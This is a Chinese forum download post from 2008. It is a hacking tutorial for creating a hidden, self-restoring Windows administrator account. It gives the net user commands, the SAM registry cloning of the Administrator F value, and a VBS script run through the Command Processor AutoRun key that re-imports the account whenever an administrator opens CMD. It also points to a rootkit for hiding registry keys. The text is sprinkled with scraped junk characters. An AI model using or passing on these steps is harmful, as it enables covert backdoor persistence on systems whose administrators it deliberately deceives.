创建不死帐号

软件简介：
大家好，今天给大家做的动画是建立不死帐户。
" s6 i3 O" h9 a  T( q5 Z1 H# d  c
5 W( c& F7 G7 |2 ^1.首先我们在DOS下建立一个用户
2 ?4 s% _- V2 Knet user yecha$ yecha /add
建立用户yecha$

7 Z' }7 U$ L0 E0 J5 Jnet localgroup administrators yecha$ /add
将yecha$提升到管理员组
2.接着打开注册表，输入：regedit，我们找到HKEY_LOCAL_MACHINE\SAM\SAM，这个时候SAM项是打不开的，我们要给他相应的权限。添加你现在登陆系统的用户，给他完全控制的权限，然后刷新，就可以打开！
0 b* y; ]' Z& ?. n. n4 k: wHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names 来到这里，我们找到刚刚建立的用户
yecha$。再将yecha$的相关项导出，yecha$对用的F值导出。最后导出administrator的F值。
9 [* v5 h/ ~' x, r7 |3.在DOS下将yecha$用户删除，然后我们将administrator的F值复制给yecha$。
- X& D2 |! B- ?  J9 a5 Z: p 将修改后的yecha$注册表信息导入注册表。

, h4 D& X# T5 b2 |9 r* W: }; F4.OK，这个时候大家可能会问这样做有什么意思呢？而且这种简单的建立帐户早就会了。当然我知道很多朋友都会这种方法来建立隐藏帐户，因为到了这一步的时候在CMD下和本地用户和组里都查看不到我们建立的这个用户！唯一存在的就是在我们的注册表里仍然有这个用户。
说到这里，我想到的就是两种思路:
一是想办法在注册表里将我们的这个用户所在注册表的键值隐藏。
二是管理员在注册表里把我们的这个用户所在注册表的键值删掉后，我们怎么能让它再自动创建。
第一种方法我不想讲了，如果大家这几天一直看我教程的话，就知道用rootkit就可以隐藏注册表键值。
6 A7 C4 \6 `) W: W9 u用ROOTKIT这款DOS下的超级隐藏工具完全可以轻松做到这一点！
第二种方法就是今天我讲到的。
' h& Q! _  X% q( F& v! T9 I3 }5 JKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
在注册表中这个项起什么作用大家知道吗？没错，他起到的作用就是打开CMD自动运行我们编辑好的脚本文件。只要在AutoRun键值中输入我们的脚本路径就OK。
( x: {* c- w+ I% _" }+ c4 Q那我们可以建立一个自动导入注册表的脚本文件：
5 D* t% s. w( s# z* S# KOn Error Resume Next
set yecha=wscript.createobject(wscript.shell)
- Y5 q* J0 u: x3 x! [  syecha.run regedit.exe /s yecha$.reg,0
0 O% s5 R* `) Y% {- Z8 [yecha.run regedit.exe /s yechaF.reg,0
将它保存为VBS文件后，放到一个隐蔽的路径下。 好，这个时候我们手工把注册表里的yecha$这个键值删掉，模仿管理员的操作。 好，我们删掉，可是管理员会经常使用CMD命令查看一些信息，这个时候比如管理员要查看机器开了哪些端口，他就执行CMD命令.看，他刚刚打开CMD窗口，结果我们的用户信息又都回来了。。。怎么样？很好的方法吧？
: G$ U* O6 {1 e* F这样当我们每次运行CMD命令的时候就会自动运行我们的脚本文件。思路就是这样了。
- _* S9 M. ~4 i% o那我们实验以下，我们能用yecha$这个用户登陆不。等一下，机器有点卡了。没有问题！
" L( F! {7 D% u' R好了，今天的教程就做到这，如果有什么不懂的可以加QQ群：47688744 新建不到4天。希望大家多来交流。。。
6 Q) W: x4 _3 Q6 i5 w下载地址：

2008-8-19 13:46 上传 创建不死帐号.rar

文件大小:

未知

下载次数:

0

下载权限:

版本vip会员

VIP专享 检测资源

有些游戏资源需要vip下载开通请点击开通vip

VIP专享,点击开通vip

确认